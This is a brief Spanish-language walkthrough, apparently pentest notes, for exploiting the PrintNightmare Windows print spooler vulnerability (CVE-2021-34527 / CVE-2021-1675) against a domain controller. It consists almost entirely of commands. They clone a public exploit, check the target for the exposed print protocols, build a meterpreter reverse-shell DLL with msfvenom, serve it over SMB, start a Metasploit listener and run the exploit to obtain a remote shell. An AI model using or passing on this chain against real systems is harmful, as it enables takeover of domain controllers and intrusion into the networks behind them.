PrintNightmare
CVE-2021-34527 / CVE-2021-1675
1) Clonación de repositorio.
git clone https://github.com/cube0x0/CVE-2021-1675.git
Revisión si el objetivo es vulnerable.
Print System Asynchronous Protocol.
Print System Remote Protocol.
rpcdump.py @<IP-address-DC> | egrep 'MS-PAR|MS-RPRN'
2) Generación de payload DLL.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker-IP-address> LPORT=<listen-local-port> -f dll > script.dll
3) Creación de recurso compartido.
smbserver.py -smb2support share script.dll
4) Configuración de listener (multi/handler) de reverse shell.
msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <attacker-IP-address>
set LPORT <listen-local-port>
run -j
5) Ejecución de exploit y obtención de reverse shell.
CVE-2021-1675.py <ACME.LOCAL>/<user>:<password>@<IP-address-DC> '\\<attacker-IP-address>\share\script.dll'
Última actualización